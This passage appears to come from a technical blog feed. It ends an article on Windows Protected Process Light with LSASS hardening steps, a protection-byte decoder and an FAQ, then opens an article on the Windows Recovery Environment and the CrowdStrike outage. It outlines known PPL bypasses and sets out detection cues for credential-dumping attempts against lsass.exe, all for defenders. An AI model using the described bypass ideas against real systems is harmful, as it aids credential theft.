itm4n 2021 PPLdump (KnownDlls)	Apr 2021	Jul 2022 (build 19044.1826)	~15 months
Landau 2023 PPLFault (CI TOCTOU)	Apr-Sep 2023	Feb 2024 (GA)	~5-11 months
itm4n 2024 BYOVDLL (KeyIso chain)	Aug 2024	none (open, CVE-by-CVE)	open
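The interval column is whole-month arithmetic on the dates in the table. A small sketch, with `monthsBetween` as a hypothetical helper, covers the two rows whose endpoints are unambiguous: PPLdump, and PPLFault measured from the September 2023 end of its disclosure range.

```javascript
// Whole calendar months between two (year, month) pairs; months are 1-12.
function monthsBetween(fromYear, fromMonth, toYear, toMonth) {
  return (toYear - fromYear) * 12 + (toMonth - fromMonth);
}

// PPLdump: disclosed April 2021, fixed July 2022.
const pplDumpMonths = monthsBetween(2021, 4, 2022, 7);

// PPLFault lower bound: September 2023 to the February 2024 GA patch.
const pplFaultMinMonths = monthsBetween(2023, 9, 2024, 2);

console.log(pplDumpMonths, pplFaultMinMonths); // prints "15 5"
```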

Note: A correctly classified PPL bypass is fixed on the standard cumulative-update cadence, not out-of-band. The implication for defenders is operational: PPL is exactly as strong as the engineering velocity Microsoft chooses to invest in it. Treat detection (Section 11) and the Credential Guard companion (Section 9) as load-bearing.

The reader takeaway is the third Aha moment of the article. PPL is real, kernel-enforced, structurally elegant, and demonstrably effective against the threat it was designed for (administrator-from-user-mode reads of LSASS). It is also explicitly not a security boundary per Microsoft's own published servicing policy, and that classification is the most important fact about it. Plan for bypasses. Stack with Credential Guard. Treat detection as primary, not secondary.

11. Practical Guide -- Configuring, Verifying, and Monitoring PPL

If you are deploying PPL on a corporate fleet, run this checklist. The order is deliberate: audit before you enforce, verify before you trust the verifier, and detect because no static control survives a motivated attacker.

Deploy

Note: Enable AuditLevel = 8 under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe for two months [@learn-runasppl]. This is a different registry hive from RunAsPPL (which lives under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); mixing the two values up is the most common Stage 0 deployment error (see §6). Collect CodeIntegrity events 3065 and 3066 to enumerate every LSASS plug-in that would fail enforcement (smart-card middleware, third-party CSPs, password-filter DLLs). Re-sign or replace the failing modules. Set RunAsPPL = 1 on Secure Boot-capable machines; the kernel automatically stores the policy in a UEFI variable. RunAsPPL = 2 (Win11 22H2+) is the softer option that omits the UEFI variable for environments requiring admin-removable protection.
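Because the two values live in different hives, it helps to reason about them together. The sketch below classifies a rollout stage from a plain object holding both values. `describeLsaProtection` and the input shape are hypothetical, and collecting the values from the registry is out of scope.

```javascript
// Sketch: classify an LSA protection rollout stage from two registry values.
//   auditLevel: AuditLevel under ...\Image File Execution Options\LSASS.exe
//   runAsPPL:   RunAsPPL under HKLM\SYSTEM\CurrentControlSet\Control\Lsa
// Missing values are passed as undefined.
function describeLsaProtection({ auditLevel, runAsPPL }) {
  if (runAsPPL === 1) return "enforced (UEFI variable on Secure Boot hosts)";
  if (runAsPPL === 2) return "enforced (no UEFI variable)";
  if (auditLevel === 8) return "audit only";
  return "not protected";
}

console.log(describeLsaProtection({ auditLevel: 8 }));              // audit only
console.log(describeLsaProtection({ auditLevel: 8, runAsPPL: 1 })); // enforced (UEFI variable on Secure Boot hosts)
```

Enforcement is checked first on purpose: a host that still carries the audit value after the switch to `RunAsPPL = 1` should report as enforced.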

Note: For third-party EDR, confirm the agent daemon runs at PPL/Antimalware (signer rung 3, byte 0x31). Process Explorer exposes this via View -> Select Columns -> Protection. System Informer (the modern Process Hacker fork that itm4n recommends in his BYOVDLL writeup [@itm4n-ghost-part1]) shows the same field in its process list. If your EDR is not running at PPL/Antimalware, it does not have the kernel's protection against admin tampering even when its vendor claims "protected" in marketing material. Process Explorer's "Protection" column ships in the canonical Sysinternals distribution [@sysinternals-procexp]; it reads EPROCESS.Protection via the NtQueryInformationProcess entry point [@learn-ntqueryinfoproc], although the specific ProcessProtectionInformation information-class value is not enumerated in the public Learn PROCESSINFOCLASS table -- the value is community-documented from Windows headers and reverse engineering rather than from a Microsoft Learn API reference.

Verify

Note: On a host you suspect of misconfiguration, attach WinDbg to the kernel and run !process 0 7 lsass.exe. The output includes the _PS_PROTECTION byte. Decode it with the formula from §3 above: ((value & 0xF0) >> 4) is the signer rung; value & 0x07 is the type; (value >> 3) & 1 is the audit bit. A RunAsPPL = 1 host yields 0x41 (PPL + Lsa). The Defender service yields 0x31 (PPL + Antimalware). csrss.exe yields 0x61 (PPL + WinTcb). If lsass.exe shows 0x00, the registry policy did not take effect on this boot.

function decode(b) {
  const type = b & 0x07;          // bits 0-2: protection type
  const audit = (b >> 3) & 0x01;  // bit 3: audit flag
  const signer = (b >> 4) & 0x0F; // bits 4-7: signer rung
  const typeNames = ['None', 'ProtectedLight', 'Protected'];
  // Rungs 7 and 8 are WinSystem and App on current builds; Max is only the enum sentinel.
  const signerNames = ['None', 'Authenticode', 'CodeGen', 'Antimalware',
                       'Lsa', 'Windows', 'WinTcb', 'WinSystem', 'App'];
  return '0x' + b.toString(16).padStart(2, '0') + ' = ' +
    (signerNames[signer] || signer) + '-' + (typeNames[type] || type) +
    (audit ? ' (Audit on)' : '');
}

// Three benchmark values you should be able to recognise by sight
console.log(decode(0x31)); // MsMpEng.exe (Defender at PPL/Antimalware)
console.log(decode(0x41)); // lsass.exe under RunAsPPL=1
console.log(decode(0x61)); // csrss.exe (PPL/WinTcb)

Monitor

Note: The CodeIntegrity provider emits four event IDs that matter for PPL monitoring [@learn-runasppl]:

| Event ID | Provider | What it tells you |
|---|---|---|
| 3033 | Microsoft-Windows-CodeIntegrity | A DLL load was blocked by CI (PPL or otherwise) |
| 3063 | Microsoft-Windows-CodeIntegrity | Enforcement mode: LSASS plug-in failed the shared-section security requirement (complement of audit-mode event 3065) |
| 3065 | Microsoft-Windows-CodeIntegrity | Audit mode: LSASS plug-in failed the shared-section requirement |
| 3066 | Microsoft-Windows-CodeIntegrity | Audit mode: LSASS plug-in failed the Microsoft signing level requirement |

Sysmon Event 10 (ProcessAccess) captures OpenProcess denials with the requested access mask and is the cheapest detection for a Mimikatz-shaped attempt against a RunAsPPL-protected lsass.exe. A burst of 3033 events from a non-Microsoft process targeting lsass.exe is the canonical signal that a PPL bypass attempt is under way.
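A triage pass over collected events can be sketched as a lookup plus a grouping step. The event record shape (`id`, `imagePath`) and the name `summariseCiEvents` are hypothetical; the audit and enforcement split follows the descriptions above.

```javascript
// Event IDs from the CodeIntegrity provider, grouped by what they imply.
const LSA_CI_EVENTS = {
  3033: { mode: "enforce", reason: "blocked by Code Integrity" },
  3063: { mode: "enforce", reason: "shared-section requirement" },
  3065: { mode: "audit", reason: "shared-section requirement" },
  3066: { mode: "audit", reason: "Microsoft signing level requirement" },
};

// Groups module paths into "would fail under enforcement" and "was blocked".
// Each event is assumed to look like { id: 3066, imagePath: "C:\\...\\x.dll" }.
function summariseCiEvents(events) {
  const seen = { audit: new Set(), enforce: new Set() };
  let unknown = 0;
  for (const { id, imagePath } of events) {
    const known = LSA_CI_EVENTS[id];
    if (!known) {
      unknown += 1;
      continue;
    }
    seen[known.mode].add(imagePath);
  }
  return {
    wouldFail: [...seen.audit].sort(),
    blocked: [...seen.enforce].sort(),
    unknown,
  };
}

const sampleSummary = summariseCiEvents([
  { id: 3066, imagePath: "C:\\Vendor\\pwfilter.dll" },
  { id: 3065, imagePath: "C:\\Vendor\\pwfilter.dll" },
  { id: 3033, imagePath: "C:\\Temp\\inject.dll" },
  { id: 4624, imagePath: "" },
]);
console.log(sampleSummary);
```

During the audit window, `wouldFail` is the re-sign-or-replace list; after enforcement, a non-empty `blocked` list is what to alert on.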

Note: PPL prevents admin-from-user-mode reads of LSASS. Credential Guard prevents kernel-mode reads of the credentials themselves (and BYOVDLL-style execution at PPL/Lsa). Deploy both. itm4n's "complementary" framing in his RunAsPPL writeup [@itm4n-runasppl] is the right operational model. On Win11 22H2 and Windows Server 2025, Credential Guard is default-on for domain-joined non-DC systems with VBS-capable hardware [@learn-cg]; on older fleets, enable it explicitly via Group Policy or the Device Guard / Credential Guard configuration script. Always both -- either alone leaves a layer of the threat model uncovered.

Note: If you are an EDR vendor wanting your daemon to run at PPL/Antimalware, the path is fixed [@learn-mvi] [@learn-am-services]:

1. Hold Microsoft Virus Initiative membership; maintain independent-lab certification (AV-Comparatives, AV-Test, SE Labs, MRG Effitas, SKD Labs, VB 100, West Coast Labs, AVLab Cybersecurity Foundation).
2. Author an ELAM driver with an embedded <ELAM> resource section enumerating your user-mode binary signing-certificate hashes.
3. Submit the driver through WHQL for Microsoft co-signing.
4. Use Trusted Signing for your user-mode binaries.
5. Verify with Process Explorer that the service launches at PPL/Antimalware after install.

Practitioners who follow the checklist still need to know the common misconceptions. The next section catalogues them.

12. FAQ -- Common Misconceptions

Seven questions practitioners ask after their first PPL deployment.

Yes for full-access termination via `OpenProcess(PROCESS_TERMINATE, ...)`; an admin without a higher signer rung cannot terminate a `PPL/Antimalware` daemon by a direct kill. No for legitimate uninstall: the vendor's MSI installer (or equivalent) typically signals the daemon to shut itself down through its own service-control path, which is gated by ACL and not by the PPL lattice. Operationally, expect administrators to be able to uninstall your EDR but not to terminate its main process from outside the vendor toolchain.

No. itm4n's verbatim warning is worth repeating [@itm4n-runasppl]: "I noticed that this protection tends to be confused with Credential Guard, which is completely different." PPL protects `lsass.exe` *as a process* from admin-from-user-mode reads. Credential Guard moves the *credentials themselves* into VTL1 memory via VBS. PPL is a VTL0 user-mode lattice control. Credential Guard is a VTL0 / VTL1 hypervisor boundary. They stack; see Section 9 for the layering and Section 11 Item 5 for the deployment recommendation.

Because Microsoft has not classified PPL as a security boundary. The Windows Security Servicing Criteria define a security boundary as a logical separation between security domains at different levels of trust, and Microsoft's published enumeration excludes administrative-process-to-PPL from that list [@msrc-servicing] [@elastic-byovd-admin]. PPL is treated as a defense-in-depth feature. The operational implication is that PPL bypasses are fixed on the next major release cadence rather than out-of-band, with disclosure-to-fix half-lives ranging from approximately five to fifteen months historically (see Section 10 for the data).

Practically no for non-AV applications. The protected-process EKU OIDs are gated by Microsoft's certificate authorities; only the Antimalware rung admits third-party certificates, and admission is mediated by ELAM driver + Microsoft Virus Initiative membership [@learn-mvi]. Hobbyist tooling cannot opt in. There is no public path for a non-AV third-party application to claim a PPL rung. If your application requires PPL-style anti-tampering, the realistic options are (a) become an MVI member if your application is an AV/EDR, (b) use Process Mitigation Policies such as Code Integrity Guard for code-injection resistance, or (c) deploy your sensitive operations inside a separate Microsoft-signed service.

"Protected service" is informal terminology for a Windows service whose host process runs as a PPL, with the Service Control Manager configured to launch it at a specific signer rung. The deployment plumbing (SCM service configuration, service-DLL packaging, the signing of the host binary) is what makes a service "protected." The PPL machinery is what makes the host process actually resistant to tampering. The two terms describe the same thing from different angles -- one from the SCM-management view, one from the kernel-access-check view.

Only if the smart-card middleware DLL is not signed at the LSA level (signer rung 4). Most major smart-card vendors have updated their middleware to be Microsoft-signed at the required level, but legacy or in-house middleware frequently fails enforcement. The recommended workflow is to run `AuditLevel = 8` for two months [@learn-runasppl], collect CodeIntegrity 3065 / 3066 events, enumerate the failing modules, re-sign or replace them, and only then switch to `RunAsPPL = 1`. Skipping the audit period is the single most common cause of authentication outages during LSA protection rollouts.

Because the threat model PPL answers is *administrator-from-user-mode*, not *administrator-from-kernel-mode*. PPL is a kernel-enforced gate in the access-check pipeline, but a kernel-mode driver that can write to `EPROCESS.Protection` can zero the byte and disable the gate for any process. The defense against the kernel-mode attacker is a different mechanism: VBS-isolated credentials in VTL1 (Credential Guard), with HVCI / kernel-mode integrity controls preventing arbitrary kernel-mode code from running in the first place. PPL stops one threat; Credential Guard stops the threat one rung up; and the two are intended to be deployed together (Section 9, Section 11 Item 5).

The arc has run from a single Mimikatz error code to a kernel-enforced lattice, a third-party admission path mediated by ELAM and MVI, an arms race shaped by a single structural insight that the kernel verifies the channel and not the behaviour, and a stacked companion boundary that lives in VTL1 because VTL0 has run out of places to hide a key. PPL is not a security boundary. That classification is not a footnote; it is the most important fact about it, because it tells defenders that the mechanism is exactly as strong as the engineering velocity Microsoft chooses to invest. Deploy it. Stack it with Credential Guard. Monitor for the next bypass.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every PPL bypass since 2018 has lived in that seam, every fix has narrowed the channel, and the seam survives because behaviour is, by Rice's theorem, structurally outside what static signature verification can reason about.

The Day 8.5 Million Devices Couldn't Boot -- and How Microsoft Rebuilt Recovery as a Security Surface

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**On July 19, 2024, the Windows Recovery Environment worked exactly as designed -- and that was the problem.** WinRE assumed a human operator per machine, and CrowdStrike's Channel File 291 priced that assumption at 8.5 million endpoints. The Windows Resiliency Initiative -- Quick Machine Recovery, MVI 3.0, the user-mode endpoint security platform, Intune-surfaced WinRE state, Point-in-Time Restore, and Cloud Rebuild -- is Microsoft's first systemic admission that the recovery path is part of the security architecture. This article maps the architecture, the program, and the trade-off it cannot remove.

1. A Fleet That Cannot Boot Itself

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 to its Falcon sensor on Windows. Forty-eight minutes later -- 04:57 UTC, give or take an hour depending on which time zone the failing devices happened to wake into -- the calls began. By the time CrowdStrike reverted the file at 05:27 UTC, roughly 8.5 million Windows endpoints were stuck in a bug-check loop on csagent+0xe14ed: a read-out-of-bounds page fault inside a kernel-mode driver registered as SERVICE_SYSTEM_START (Start=1), so it reloaded on every reboot [@crowdstrike-tech-details, @ms-security-jul27, @ms-crowdstrike-jul20].

The fix was published almost immediately. "Boot to Safe Mode," it said. "Delete C-00000291*.sys. Reboot." If the volume was BitLocker-encrypted, find the recovery key first [@ms-kb5042421]. The instruction was technically correct. It was also a procedure for one machine. The Windows Recovery Environment that the procedure depended on -- WinRE -- worked exactly as it was designed to work, on every one of those 8.5 million devices [@ms-crowdstrike-jul20]. That was the problem.

Think about the engineering. The recovery partition was where it should be. The Boot Configuration Data store pointed at the right winre.wim. The two-failed-boots trigger fired. The blue Safe Mode tile rendered. The keyboard input handler took keystrokes. The NTFS read-write driver inside WinRE deleted the bad channel file. The reboot succeeded. Every line of code in the recovery path behaved exactly as the engineers in Redmond had specified. The architecture did not break.

What broke was the architecture's central assumption: that a person would be sitting in front of the screen.

This article argues that the assumption was a security choice as much as a usability choice, and that the cost of that choice was a denial-of-service event measured not in seconds of downtime but in person-days of triage. What follows: the WinRE architecture as it actually exists on every Windows 11 device today, the lineage that produced that architecture, the failure mode that priced the architecture's blind spot, and the Windows Resiliency Initiative that Microsoft began assembling in the months after the incident.

A second thesis follows from the first. Recoverability is a security property. A platform that cannot recover at scale cannot guarantee availability; a platform that cannot guarantee availability cannot keep its confidentiality and integrity promises either, because operations teams in the middle of a fleet-down event will eventually pull every encryption layer and every signing check that gets in their way. The two legs of the CIA triad we usually study -- confidentiality and integrity -- have spent decades crowding out the third, availability. CrowdStrike forced the third one back onto the page.

If WinRE worked perfectly on July 19, 2024, what does it actually do? And how did a recovery primitive end up being the architecture's single point of human dependence? Those questions are next.

2. The Architecture: WinRE, `winre.wim`, `boot.sdi`, ReAgentC

Before we explain how WinRE failed at scale, we have to be precise about what WinRE is. Most engineers know it as the screen that appears after two bad boots. That description is correct and unhelpful. WinRE is a Windows Preinstallation Environment image -- winre.wim -- backed by a system deployment image ramdisk and managed by ReAgentC.exe, registered with the Windows Boot Manager via an entry in the Boot Configuration Data store [@ms-winre-tech-ref, @ms-reagentc, @ms-bcd]. Each of those four moving pieces does one job; together they make the recovery surface possible.

Windows Preinstallation Environment (WinPE). A small, self-contained Windows operating system used to install, deploy, and repair Windows desktop editions and Windows Server [@ms-winpe-intro]. WinPE is the substrate of Windows Setup, the install media's `boot.wim`, and `winre.wim`. The base image requires 512 MB of RAM and automatically reboots after 240 hours of continuous use on Windows 10 1803 and later [@ms-winpe-intro]. Originally released to manufacturing in 2002 by a Microsoft team that included Vijay Jayaseelan, Ryan Burkhardt, and Richard Bond [@wiki-winpe].

`boot.sdi`. A small image-format file that the Windows Boot Manager uses to allocate a RAM disk into which a WIM image can be mounted at boot time. The WinRE BCD entry references `boot.sdi` through a `ramdiskoptions` element; the `osdevice` element then names `winre.wim` as the image to mount inside that RAM disk [@ms-bcd, @ms-winre-tech-ref].

Boot Configuration Data (BCD). The binary database that replaced `boot.ini` in Windows Vista. The BCD lives on the EFI System Partition on UEFI machines and is the data structure the boot manager reads to decide what to boot. Each entry is a typed collection of *elements* -- `device`, `osdevice`, `path`, `winpe`, `ramdiskoptions`, `recoverysequence`, and others -- manipulated with `bcdedit.exe` [@ms-bcd].

Recovery partition. A dedicated GPT partition holding `winre.wim`, identified by partition Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and recommended for placement immediately after the Windows partition. The minimum size is 300 MB, with 250 MB of free space recommended to accommodate future updates [@ms-uefi-gpt]. On Image Configuration Designer media, this partition is the default layout; clean Setup may instead use a `\Recovery\WindowsRE` folder inside the Windows partition [@ms-winre-tech-ref].

Restated in the order a practitioner encounters them on disk, the four pieces are:

The recovery partition. The default UEFI/GPT layout from the Image Configuration Designer places a Windows RE Tools partition after the Windows partition, sized to hold winre.wim with headroom for cumulative-update growth [@ms-uefi-gpt]. The GPT Type ID DE94BBA4-06D1-4D40-A16A-BFD50179D6AC lets bootmgr find the partition without depending on the Windows volume's drive letter. A \Recovery\WindowsRE folder inside the OS volume is an equally valid alternative; some OEMs use one, some the other. The variability is invisible at runtime: bootmgr follows the BCD, not the disk layout. But it matters at provisioning time. Always check reagentc /info after deployment to know which arrangement you have, because the Microsoft-recommended fix for "winre.wim is too small after a cumulative update" (KB5028997) depends on which partition the image lives in.
winre.wim. A customised WinPE image. The lineage goes back to Windows PE 1.0, RTMed in 2002 from Windows XP RTM [@wiki-winpe]. Today's winre.wim is built from Windows 10 / 11's WinPE 10 line and includes the recovery shell, Startup Repair, System Restore (when enabled on the host), command prompt, and a curated list of optional drivers. The base image still inherits the WinPE rules: 512 MB minimum RAM, 240-hour reboot cap on Windows 10 1803+ [@ms-winpe-intro].
boot.sdi. Sits on the recovery partition (or in \Recovery\WindowsRE\) and acts as a fixed-size container into which the boot manager creates a RAM disk at boot time [@ms-bcd]. The .sdi extension stands for *System Deployment Image*, the same file format used by older Windows Deployment Services workflows in which a thin ramdisk holds a boot.wim for PXE installs. The RAM disk is where winre.wim is mounted. boot.sdi is small (a few megabytes), unmodifiable in normal operation, and one of the parsers later abused by the BitUnlocker chain [@ms-bitunlocker-blog]; we return to that in Section 9.
ReAgentC.exe. The in-box management tool. Microsoft Learn documents the supported switches: /info, /enable, /disable, /setreimage /Path <Folder>, /boottore, /setbootshelllink, and the now-deprecated /setosimage (no longer used on Windows 10 or later) [@ms-reagentc]. The same page notes that for offline operations on WinPE 2.x/3.x/4.x images, administrators must instead use Winrecfg.exe from the Windows Assessment and Deployment Kit -- a clue that the online mode of ReAgentC.exe predated the offline mode. The tool has shipped since at least Windows 7; the precise RTM month is not surfaced on Microsoft Learn today. The web is full of confident claims that ReAgentC.exe first shipped in Vista, Windows 7, or Windows 8. The safe attribution is "Windows 7 onwards" because that is the era when the recovery-partition + ReAgentC model became the supported default. Microsoft Learn does not name an exact ship version, and the AI summaries that do are inferring from circumstantial evidence [@ms-reagentc].
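The advice to check reagentc /info after deployment can be scripted. The sketch below is a minimal illustration, assuming the tool prints "label: value" lines and a GLOBALROOT-style location path; the sample text is illustrative rather than captured from a real machine, and parseReagentcInfo, winreLocation, and the caller-supplied OS partition number are hypothetical names introduced here.

```javascript
// Illustrative sample only; real output varies by Windows build and locale.
const sample = [
  'Windows RE status:         Enabled',
  'Windows RE location:       \\\\?\\GLOBALROOT\\device\\harddisk0\\partition4\\Recovery\\WindowsRE',
  'Recovery image index:      0',
].join('\n');

// Split each "label: value" line at the first colon.
function parseReagentcInfo(text) {
  const info = {};
  for (const line of text.split(/\r?\n/)) {
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    const key = line.slice(0, idx).trim();
    if (key) info[key] = line.slice(idx + 1).trim();
  }
  return info;
}

// Compare the WinRE partition number with the OS partition number, which the
// caller must supply (an assumption: the path alone does not reveal it).
function winreLocation(info, osPartitionNumber) {
  const enabled = info['Windows RE status'] === 'Enabled';
  const match = /harddisk(\d+)\\partition(\d+)/i.exec(info['Windows RE location'] || '');
  if (!match) return { enabled, disk: null, partition: null, layout: 'unknown' };
  const partition = Number(match[2]);
  return {
    enabled,
    disk: Number(match[1]),
    partition,
    layout: partition === osPartitionNumber
      ? 'folder on OS volume'
      : 'dedicated recovery partition',
  };
}

const result = winreLocation(parseReagentcInfo(sample), 3);
console.log(result);
```

Knowing which layout a device has tells you which resize procedure applies before a cumulative update grows winre.wim.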

All four pieces have to cooperate at the worst possible moment: when the Windows partition refuses to boot. The question for the next section is the literal handoff. How does the firmware end up running winre.wim?

3. The Mechanism: How a WinRE Boot Actually Happens

There is a sentence that appears in dozens of TechNet-era guides and AI summaries: Windows boots WinRE by running winload.exe /recovery. That sentence is wrong. There is no /recovery switch on winload.efi or winload.exe. The BCD Boot Options Reference enumerates every legal element on a boot entry, and recoverysequence is one of them; a command-line switch with that name is not [@ms-bcd]. WinRE is selected through the BCD, not through a flag passed to the loader.

Note: The BCD Boot Options Reference defines every element on a boot entry: device, osdevice, path, description, recoverysequence, winpe, ramdisksdidevice, ramdisksdipath, and a few dozen others [@ms-bcd]. None of them is exposed as a winload.exe /recovery command-line flag. The recovery handoff happens entirely inside the boot manager, before winload.efi ever runs.

Walk the literal boot sequence on a UEFI machine [@ms-winre-tech-ref, @ms-bcd]:

Firmware passes control to bootmgfw.efi on the EFI System Partition. (On legacy BIOS, it would be bootmgr from the active partition.)
The boot manager reads the BCD store. There is one entry of type Windows Boot Manager and one or more entries of type Windows Boot Loader.
The OS loader entry carries an element called recoverysequence, set to the GUID of a separate BCD entry. That separate entry is the WinRE configuration.
On a normal boot, the boot manager loads the OS entry's path (\Windows\System32\winload.efi) against the OS volume named in device/osdevice, and winload.efi brings up the kernel.
On a recovery trigger -- two failed boots, a corrupted system file, an explicit reagentc /boottore, or the user choosing Restart from the Advanced Startup menu -- the boot manager instead follows recoverysequence to the WinRE entry.
The WinRE entry's elements look like this: winpe Yes, osdevice ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, device ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, and path \Windows\System32\Boot\winload.efi. The ramdiskoptions element it points to in turn carries ramdisksdidevice and ramdisksdipath (\Recovery\WindowsRE\boot.sdi).
The boot manager creates a RAM disk backed by boot.sdi, mounts winre.wim inside it, and starts winload.efi against that ramdisk. From winload.efi's point of view, the OS being booted is the one inside winre.wim. The kernel comes up in the RAM disk and presents the Windows RE entry-point UI.

flowchart TD
    F[UEFI firmware] --> BM[bootmgfw.efi on ESP]
    BM --> BCD[Read BCD store]
    BCD --> CHK{Trigger fired?}
    CHK -- No --> OS[OS loader entry, winload.efi, Windows partition]
    CHK -- Yes --> RS[Follow recoverysequence GUID]
    RS --> WRE[WinRE BCD entry: winpe Yes, osdevice ramdisk=...winre.wim]
    WRE --> RD[Allocate RAM disk from boot.sdi]
    RD --> MNT[Mount winre.wim into RAM disk]
    MNT --> WL[winload.efi loads WinPE kernel]
    WL --> UX[WinRE entry-point UI]

The five auto-trigger conditions are enumerated verbatim in the Windows RE Technical Reference [@ms-winre-tech-ref]:

Two consecutive failed attempts to start Windows.
Two consecutive unexpected shutdowns within two minutes of boot completion.
Two consecutive system reboots within two minutes of boot completion.
A Secure Boot error (except for issues related to Bootmgr.efi).
A BitLocker error on touch-only devices.

flowchart LR
    A[Two failed boots] --> ENT[Enter WinRE]
    B[Two unexpected shutdowns within 2 min of boot] --> ENT
    C[Two reboots within 2 min of boot] --> ENT
    D[Secure Boot error -- not Bootmgr.efi] --> ENT
    E[BitLocker error on touch-only device] --> ENT
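The five conditions can also be read as a single predicate. This is a sketch only: the field names on the state object are hypothetical, and the order in which the conditions are checked is an assumption, since the reference enumerates them without stating a priority.

```javascript
// Returns the name of the first matching auto-trigger, or null when none applies.
// Field names are hypothetical; the five conditions come from the list above.
function winreTrigger(state) {
  if (state.consecutiveFailedBoots >= 2) {
    return 'two failed boots';
  }
  if (state.consecutiveEarlyShutdowns >= 2) {
    return 'two unexpected shutdowns within 2 min of boot';
  }
  if (state.consecutiveEarlyReboots >= 2) {
    return 'two reboots within 2 min of boot';
  }
  // Secure Boot errors count unless the problem is with Bootmgr.efi itself.
  if (state.secureBootError && !state.errorIsBootmgr) {
    return 'Secure Boot error';
  }
  // BitLocker errors count only on touch-only devices.
  if (state.bitLockerError && state.touchOnly) {
    return 'BitLocker error on touch-only device';
  }
  return null;
}

console.log(winreTrigger({ consecutiveFailedBoots: 2 }));
console.log(winreTrigger({ bitLockerError: true, touchOnly: false }));
```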

Walking the BCD elements themselves makes the absence of any /recovery switch visible. Here is a minimal model of what the boot manager actually consumes.

{`
// Paraphrased from the BCD Boot Options Reference. Real bcdedit output is text,
// but the boot manager reads it as a typed key/value store.

const bcd = {
  bootmgr: {
    type: 'Windows Boot Manager',
    default: '{current}',
    displayorder: ['{current}'],
  },
  '{current}': {
    type: 'Windows Boot Loader',
    device: 'partition=C:',
    osdevice: 'partition=C:',
    path: '\\Windows\\system32\\winload.efi',
    description: 'Windows 11',
    recoverysequence: '{a1b2-...-winre-guid}',
    recoveryenabled: 'Yes',
  },
  '{a1b2-...-winre-guid}': {
    type: 'Windows Boot Loader',
    device: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}',
    osdevice: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}',
    path: '\\Windows\\system32\\Boot\\winload.efi',
    description: 'Windows Recovery Environment',
    winpe: 'Yes',
    nx: 'OptIn',
  },
  '{ramdiskopts}': {
    type: 'Device Options',
    description: 'Ramdisk Options',
    ramdisksdidevice: 'partition=\\Device\\HarddiskVolume4',
    ramdisksdipath: '\\Recovery\\WindowsRE\\boot.sdi',
  },
};

// The boot manager picks one of these entries, depending on whether
// recoverysequence has been activated. No command-line flag is involved.
// bootDecision is an illustrative helper, not a boot-manager API; its three
// parameters (failed-boot count, Secure Boot error, BitLocker error on a
// touch-only device) are assumed for this model.
function bootDecision(failedBoots, secureBootError, bitLockerTouchError) {
  const os = bcd[bcd.bootmgr.default];
  const triggered = failedBoots >= 2 || secureBootError || bitLockerTouchError;
  return triggered && os.recoveryenabled === 'Yes' ? bcd[os.recoverysequence] : os;
}

const chosen = bootDecision(2, false, false);
console.log('Loader path the boot manager invokes:');
console.log(' ' + chosen.path);
console.log('Backing device:');
console.log(' ' + chosen.osdevice);
console.log('winpe flag (Yes means "boot a WIM into a ramdisk"):');
console.log(' ' + (chosen.winpe || '(unset, normal OS boot)'));
`}

That is the entire mechanism. Two failed boots flip an in-BCD counter; the boot manager follows recoverysequence instead of the default loader path; the WinRE entry mounts winre.wim in a RAM disk; the kernel inside winre.wim comes up. No flags, no shells, no scripts.

Now we know what WinRE is and how it boots. The remaining historical question is how this architecture came to be, and what about it did not change between 2007 and July 19, 2024.

4. Historical Origins: From the Recovery Console to the Recovery Partition (2000-2012)

Every architectural choice in WinRE was a response to something that did not work the year before. Walk the four pre-WRI generations of Windows recovery and the story is one long relaxation of the assumption that recovery requires physical media.

Generation 1: Emergency Repair Disk (NT 3.x and 4.0, 1993-2000)

A floppy disk plus a %SystemRoot%\repair directory contained snapshotted SYSTEM, SOFTWARE, SAM, and SECURITY registry hives [@wiki-recovery-console]. The administrator booted from the three Windows NT Setup floppies, pressed R for Repair, fed the floppy when prompted, and Setup wrote the snapshotted hives back over the damaged on-disk copies. ERD repaired the registry, nothing more. If NTOSKRNL.EXE itself was missing, the operator was reduced to a DOS floppy plus EXPAND from the install CD. The architecture's failure mode was the obvious one for a floppy-based snapshot system: the floppy got lost; the snapshot was stale; the scope was too narrow.

Emergency Repair Disk (ERD). The Windows NT 3.x and 4.0 recovery mechanism: a snapshot of the registry hives written to a floppy by `RDISK.EXE` plus a small `%SystemRoot%\repair` folder. It restored only the registry and required the NT Setup floppies to boot. Wikipedia's *Recovery Console* article identifies the Recovery Console as ERD's successor [@wiki-recovery-console].

Generation 2: Recovery Console (Windows 2000, February 17, 2000)

The Recovery Console replaced the binary "restore the snapshot" decision with a programmable shell. Boot from the Windows 2000 or XP install CD; choose Repair; the operator landed in a cmd.exe-shaped environment with around three dozen internal commands: copy, del, attrib, chkdsk, fixboot, fixmbr, bootcfg, and the rest [@wiki-recovery-console]. Authentication required the local Administrator password; filesystem access was sharply constrained (read-only by default; on the boot volume only the root and %SystemRoot% were writable, unless Group Policy relaxed those limits).

Recovery Console. The Windows 2000/XP/Server 2003 command-line repair shell. Initial release February 17, 2000; superseded by the Windows Recovery Environment in Windows Vista. Loadable from the install CD or installable as a startup option via `winnt32 /cmdcons`. Wikipedia lists Windows Recovery Environment as its named successor [@wiki-recovery-console].

The Recovery Console did not fail technically. It failed culturally. By 2005 the Windows administrator population had shifted decisively to GUI tools. A 2005 user with a corrupt NTLDR and no install CD had no path to repair the box without buying replacement media. There was no automatic-repair logic and no on-disk presence; the install CD was always required, and every fix demanded muscle memory the typical administrator no longer had.

Generation 3: WinRE on Installation Media (Windows Vista, January 2007)

